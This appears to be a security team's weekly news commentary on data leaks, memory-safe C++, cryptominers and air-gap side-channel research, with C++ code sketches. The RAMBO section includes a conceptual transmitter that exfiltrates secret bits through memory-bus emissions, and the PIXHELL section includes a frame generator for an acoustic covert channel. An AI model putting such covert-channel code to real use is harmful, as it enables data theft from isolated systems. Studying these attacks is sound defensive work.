Leaks & breaches, memory-safe C++, cryptominers and bridging the air-gap

Hello! AaronJB from the F5 Security Incident Response Team back with you as your editor, looking back at the news from the week of September 8th through 14th; as always, the week was packed with news from leaks of confidential information to new Tactics, Techniques and Procedures (TTPs) for known adversaries and more. Let's take a quick look at the notable stuff, and I'll throw in a couple of articles from my own "special interest" collection of hardware vulnerabilities.

A week of leaks

There were two high-profile leaks of confidential information in the news last week: one from Capgemini and one from Fortinet. What caught my eye this time is the size of the breaches, but not in the way you'd expect. We've become quite used, recently, to giant 'breaches' being dropped with billions of records and hundreds of GB per dump, but many of these giant breaches - like the Mother of All Breaches (MOAB), an aggregation of older breaches whose largest single component was Tencent QQ data - turn out to have huge overlap with previous breaches. Personally, I've become quite desensitized to the emails from https://haveibeenpwned.com/ letting me know my details are "out there" because, well, my details have been "out there" so many times before!

If you have some basics in place, the risk from PII leaks is mostly reduced to extremely convincing phishing attacks (not to diminish the risk of phishing attacks - they're arguably the #1 way to compromise any given target):

  • Credit monitoring or, better still, a locked credit file to mitigate the risk of identity theft
  • Unique passwords and a password manager to mitigate the risk of stolen passwords
  • 2FA/MFA enforced on as many sites & applications as possible, again mitigating the risk of stolen passwords and somewhat mitigating the risk of phishing & account takeover (you still have to be alert for someone phishing the token from you, of course, and many sites still use SMS as the second factor, which is vulnerable to SIM-swapping); if you've ever wondered how those rotating six-digit codes are generated, there's a small sketch just after this list
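
As an aside, the rotating six-digit codes most authenticator apps produce are just TOTP (RFC 6238): an HMAC-SHA1 over the current 30-second time step, dynamically truncated to six digits. Here's a minimal, hedged sketch in C++ using OpenSSL's HMAC; the hard-coded secret is the RFC test-vector key, used purely for illustration, and real implementations also handle base32 decoding and clock-drift windows.

```cpp
// Minimal TOTP (RFC 6238) sketch: HMAC-SHA1 over the current 30-second
// time step, dynamically truncated to a 6-digit code.
// Build with: g++ totp.cpp -lcrypto
#include <openssl/evp.h>
#include <openssl/hmac.h>
#include <cstdint>
#include <cstdio>
#include <ctime>
#include <string>

std::uint32_t totp(const std::string& secret, std::time_t now) {
    std::uint64_t counter = static_cast<std::uint64_t>(now) / 30;
    unsigned char msg[8];
    for (int i = 7; i >= 0; --i) {  // counter as 8 big-endian bytes
        msg[i] = counter & 0xff;
        counter >>= 8;
    }
    unsigned char mac[EVP_MAX_MD_SIZE];
    unsigned int mac_len = 0;
    HMAC(EVP_sha1(), secret.data(), static_cast<int>(secret.size()),
         msg, sizeof(msg), mac, &mac_len);
    // RFC 4226 dynamic truncation: the low nibble of the last byte
    // selects a 4-byte window; mask the sign bit and keep 6 digits.
    const unsigned off = mac[mac_len - 1] & 0x0f;
    const std::uint32_t bin = ((mac[off] & 0x7f) << 24) |
                              (mac[off + 1] << 16) |
                              (mac[off + 2] << 8) |
                              mac[off + 3];
    return bin % 1000000;
}

int main() {
    // Raw shared secret (real apps store this base32-encoded); this is
    // the RFC 6238 test key, used here purely for illustration.
    const std::string secret = "12345678901234567890";
    std::printf("%06u\n", static_cast<unsigned>(totp(secret, std::time(nullptr))));
}
```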

Anyway, back to the breaches from last week! What caught my eye was how small they sounded. Fortinet stated the breach was "limited" in size while the Capgemini dump was "only" 20GB, so it's all fine, right?

Well, when you dig further, the Fortinet breach turned out to allegedly be 400GB of customer data stolen from an S3 bucket, while the Capgemini dump contained source code, private keys, employee credentials, and customer data in the form of virtual machine logs. Those kinds of leaks are much, much harder to deal with as someone impacted. Once your source code is out, it's out; no amount of password-changing will help you there. It means attackers can start digging for 0-days, build malicious versions of your toolsets and try to phish them onto systems (is there a term for that? We have phishing, smishing, quishing... what's it called when you send someone a phishing email that entices them to download and install your malicious "update"? Dishing? Sorry, sorry, back on topic!), or maybe work out how to intercept communications or leverage configuration channels once they're inside a network where your software is deployed. The list is endless and worrying. Keys, at least, can be rotated (however painful that is for most organisations), as can employee credentials, but the reputational impact of losing your customer data? Ouch.

Let me be clear - I am not dunking on Fortinet or Capgemini here, because I know we all live in glass houses when it comes to security. One small slip by one person can, in the right circumstances, be all it takes for an attacker to breach an organisation - which is why we take the security of F5 so very seriously. We all know restrictions on our individual freedoms (I'm talking about corporate workstations, here!) are a pain, and there is definitely a balance to be struck between security & functionality, but given the vast amounts of customer data we hold at F5, we have to accept a degree of pain to ensure we're doing the most we can to secure that data. So, for those outside F5 reading this, rest assured we take security & privacy very seriously, with regular training for all employees, strict endpoint security enforced, MFA for everything and so on. I'm sure Fortinet and Capgemini do the same, which further goes to show that we all live in glass houses.

Move over Rust, C++ wants to be the new memory-safe darling

So if phishing (above) is the most common route into a target organisation, what's the second? Bugs! Bugs in code, coupled with the ubiquity of memory-unsafe languages like C and C++, mean that many simple mistakes can turn into a vector for exploitation. When the onus is on the developer to ensure the code never reads or writes out-of-bounds, that allocated memory is always freed (and never touched again afterwards) and so on, the possibilities for vulnerabilities are endless.
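
To make that concrete, here's a deliberately contrived C++ sketch of two of the classic bug classes - an out-of-bounds write and a use-after-free. Both compile without complaint, and both are undefined behaviour that attackers have historically turned into code execution; the buffer size and "attacker input" are made up purely for illustration.

```cpp
// Two classic C/C++ memory-safety bugs in miniature: the compiler
// happily accepts both, and both are undefined behaviour at runtime.
#include <cstring>
#include <iostream>

int main() {
    // 1. Out-of-bounds write: nothing stops us copying past the end of
    //    the buffer - attacker-controlled input overwrites the stack.
    char buf[8];
    const char* attacker_input = "far more than eight bytes";
    std::strcpy(buf, attacker_input);  // stack buffer overflow

    // 2. Use-after-free: the pointer outlives its allocation, so the
    //    read below touches memory the allocator may have reused.
    int* p = new int(42);
    delete p;
    std::cout << *p << '\n';  // reads freed memory
}
```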

What's the alternative? There are many memory-safe languages available now - some of which have been around for 20+ years - like Java, Python and Swift, and more recently Go & Rust. While Java is incredibly popular, it doesn't exactly have a reputation for speed (Java being 110th fastest at solving for primes), so it never saw widespread adoption for things that needed ultimate speed on the platform (like BIG-IP!), where the closer you can get to the bare metal, the faster you go. On the flip side, assembly language isn't the best tool for a huge project (like BIG-IP), so the industry sort of settled on C & C++... enter Rust! I'm not sure why Go didn't become the memory-safe darling when it has been available longer than Rust, but in the last year or so Rust has started making waves, with companies like Microsoft replacing C and C++ code wholesale because Rust is memory-safe and removes a whole class of vulnerabilities by construction, with no extra vigilance required of the developer.

Of course, Rust is not without its own vulnerabilities, as we saw earlier this year, but the same can be said of C & C++'s standard libraries. Still, the C++ community has responded and understands the need for modernization; Rust is a new language, the existing pool of developers in the workforce knows C++, and the differences between the languages make migration difficult - so surely it is better to extend C++ to make it memory-safe?

Enter the Safe C++ proposal. Hopefully, as others have written, this will allow a much more rapid pace of adoption for memory-safe practices, eliminating a huge attack surface and making everyone's lives that much easier and more secure. In fact, I would hope that Safe C++ would allow automated tooling to convert existing code from C++ to Safe C++. It's a case of "time will tell" on this one; the tools and compilers existing is just one part of the puzzle, of course - companies will still have to invest the time to convert their code, and what company wants to spend time doing that when they could be adding shiny new features to their existing codebase instead?
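
While we wait for Safe C++ (to be clear, none of the proposal's actual syntax appears below), today's standard library can already close off both bug classes from the earlier sketch - if you opt in. A minimal, hedged illustration of bounds-checked access and explicit ownership:

```cpp
// The earlier sketch rewritten defensively with today's standard C++:
// bounds-checked access and ownership types remove both bug classes.
#include <iostream>
#include <memory>
#include <stdexcept>
#include <string>
#include <vector>

int main() {
    // Bounds-checked writes: at() throws instead of corrupting the stack.
    std::vector<char> buf(8);
    const std::string attacker_input = "far more than eight bytes";
    try {
        for (std::size_t i = 0; i < attacker_input.size(); ++i)
            buf.at(i) = attacker_input[i];  // throws std::out_of_range
    } catch (const std::out_of_range&) {
        std::cerr << "input too large, rejected\n";
    }

    // Explicit ownership: unique_ptr frees exactly once, and there is
    // no raw pointer left behind to dangle after the free.
    auto p = std::make_unique<int>(42);
    std::cout << *p << '\n';  // valid for the lifetime of p
}  // p's int is freed here, automatically
```

The catch, of course, is that nothing forces you to write it this way - which is exactly the gap a borrow-checked, memory-safe dialect aims to close.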

Mining, always mining

I don't know why this always surprises me; I thought there would be better things to do with compromised systems than just mine cryptocurrency (like pivoting elsewhere in the target), but perhaps compromised systems are such a commodity now that the best thing to do is mine tiny amounts of crypto on thousands (or more) of systems and take the cash? Either way, last week saw two crypto-mining campaigns discovered: one targeting Selenium Grid servers and the other targeting Oracle WebLogic, so check out those writeups if you use either.

Bridging the air-gap

One last pair of articles! The reality is that these two attacks will appear in very few people's threat models - there are just easier ways to steal information from most targets (we're back to phishing again) - but those who work in extremely sensitive environments where air-gapping (the practice of physically separating a system from all others - no networking, no wireless connectivity, etc.) is prevalent might want to take a look. These always pique my interest because one of the earliest security topics I learned about was TEMPEST; at the time I was a young teen and my father worked in the Royal Air Force, so I spent some time on base knocking about the med centre where he was chief medic. I learned about TEMPEST when all the windows were upgraded with shielding and my dad explained why. As a young computer nerd, it was fascinating!

Although the research which led to the TEMPEST standards started in the 1940s, we are still discovering new and novel ways of inferring digital information from leaked emissions.

First up, RAMBO ("Radiation of Air-gapped Memory Bus for Offense"), which allows an attacker with a simple software-defined radio (SDR) to steal information from a nearby system by way of the radio signals leaked by the air-gapped system's RAM; if an attacker can install malware on the target system (hello, Stuxnet!), then that malware can leverage the resulting side-channel to exfiltrate sensitive information to a nearby receiver. Pretty neat, and slightly more direct than your classic "sniff the VGA/HDMI/DVI cable", too.
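
To give a feel for the transmitter side, here's a conceptual C++ sketch of the idea: encode bits as on-off keying by alternating bursts of memory-bus traffic with idle periods, and let the SDR demodulate the leaked emissions. The actual research uses carefully crafted memory instructions for a much cleaner signal; the buffer size and bit period below are illustrative assumptions, not figures from the paper.

```cpp
// Conceptual transmitter for a RAMBO-style covert channel: a '1' is a
// burst of memory-bus activity, a '0' is silence, and a nearby SDR
// demodulates the resulting EM emissions. Illustrative sketch only.
#include <chrono>
#include <cstddef>
#include <cstdint>
#include <thread>
#include <vector>

// Assumed parameters: a buffer big enough that writes keep missing the
// CPU caches and hitting RAM, and a bit period slow enough to receive.
constexpr std::size_t kBufBytes = 64 * 1024 * 1024;
constexpr auto kBitPeriod = std::chrono::milliseconds(100);

void transmit_bit(std::vector<std::uint8_t>& buf, bool bit) {
    const auto end = std::chrono::steady_clock::now() + kBitPeriod;
    if (bit) {
        // '1': hammer the memory bus for the whole bit period,
        // touching one byte per cache line to maximise bus traffic.
        while (std::chrono::steady_clock::now() < end)
            for (std::size_t i = 0; i < buf.size(); i += 64)
                buf[i]++;
    } else {
        // '0': stay idle so the bus is (comparatively) quiet.
        std::this_thread::sleep_until(end);
    }
}

int main() {
    std::vector<std::uint8_t> buf(kBufBytes);
    const std::uint8_t secret = 0b10110010;  // one byte to exfiltrate
    for (int i = 7; i >= 0; --i)
        transmit_bit(buf, (secret >> i) & 1);
}
```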

Next up, PIXHELL. Unlike the classic attack I just mentioned - where a radio receiver sniffs the radio frequency emissions leaked from the display cables - this attack leverages the audio leaked by the coils & capacitors in the screen to reconstruct information injected by malware on the target air-gapped system. Hands up everyone whose hearing is still good enough to detect "coil whine" from electronic components? Actually, my first thought when I read this research was about my Dell docking station, which screeches and screams (I'm exaggerating, but there is a lot of load-dependent coil whine!) at me as I work. I wonder what digital secrets it is leaking (quite audibly, too!) to anyone listening...
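
The modulation concept can be sketched in the same spirit: PIXHELL-style malware encodes bits by switching between a high-contrast stripe pattern (which provokes the audible whine) and a quiet black frame. The snippet below only constructs the frames - the resolution, stripe width and the business of actually presenting them full-screen per bit period are all assumptions for illustration, not details from the paper.

```cpp
// Conceptual PIXHELL-style frame generator: alternating black/white
// stripes drive rapid load changes in the panel's power circuitry
// (audible coil whine); a flat black frame keeps it quiet.
#include <cstdint>
#include <vector>

// Assumed display geometry, for illustration only.
constexpr int kWidth = 1920;
constexpr int kHeight = 1080;

// Build one 8-bit grayscale frame of horizontal stripes of the given
// thickness in pixels; thinner stripes shift the emitted tone higher.
std::vector<std::uint8_t> stripe_frame(int stripe_px) {
    std::vector<std::uint8_t> frame(kWidth * kHeight);
    for (int y = 0; y < kHeight; ++y) {
        const std::uint8_t v = (y / stripe_px) % 2 ? 255 : 0;
        for (int x = 0; x < kWidth; ++x)
            frame[y * kWidth + x] = v;
    }
    return frame;
}

int main() {
    const auto noisy = stripe_frame(2);  // '1': provokes coil whine
    const std::vector<std::uint8_t> quiet(kWidth * kHeight, 0);  // '0'
    // A real transmitter would present `noisy` or `quiet` full-screen
    // for each bit period; displaying frames is out of scope here.
    (void)noisy;
    (void)quiet;
}
```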

Hardware-layer attacks like these hold a special interest for me, which is why I often find myself writing about them (see also: Rowhammer, Spectre, Meltdown, etc. etc.), even though I know they are not "real world" threats for most of us. Still, I hope you enjoyed the commentary nonetheless!

'Til next time...
